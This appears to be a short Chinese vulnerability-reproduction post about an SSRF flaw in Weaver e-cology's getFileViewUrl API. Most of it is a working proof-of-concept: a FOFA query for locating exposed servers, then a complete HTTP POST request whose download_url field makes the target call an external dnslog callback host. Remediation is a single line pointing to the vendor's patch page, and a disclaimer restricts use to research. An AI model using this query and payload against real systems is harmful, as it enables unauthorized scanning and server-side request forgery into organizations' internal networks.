1. 泛微e-cology getFileViewUrl接口简介
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发
泛微e-cology依托全新的设计理念,全新的管理思想为中大型组织创建全新的高效协同办公环境。
2.漏洞描述
泛微e-cology依托全新的设计理念,全新的管理思想。 为中大型组织创建全新的高效协同办公环境。 智能语音办公,简化软件操作界面。 身份认证、电子签名、电子签章、数据存证让合同全程数字化。
CVE编号:
CNNVD编号:
CNVD编号:
3.影响版本
泛微e-cology
4.fofa查询语句
app="泛微-OA(e-cology)"
5.漏洞复现
漏洞链接:http://xx.xxx.xxx.xxx/api/doc/mobile/fileview/getFileViewUrl
漏洞数据包:
POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1
Host: xx.xxx.xx.xxx
User-Agent:Mozilla/5.0(Windows NT 10.0; WOW64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/108.0.0.0Safari/537.36
Accept:*/*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Content-Length: 110
{
"file_id": "1000",
"file_name": "c",
"download_url":"http://kitgeqiwwobfretc.t841xp.dnslog.cn"
}
7.整改意见
请联系官方打补丁:https://www.weaver.com.cn/e9/
原文始发于微信公众号(南风漏洞复现文库):泛微e-cology getFileViewUrl接口存在SSRF漏洞 附POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论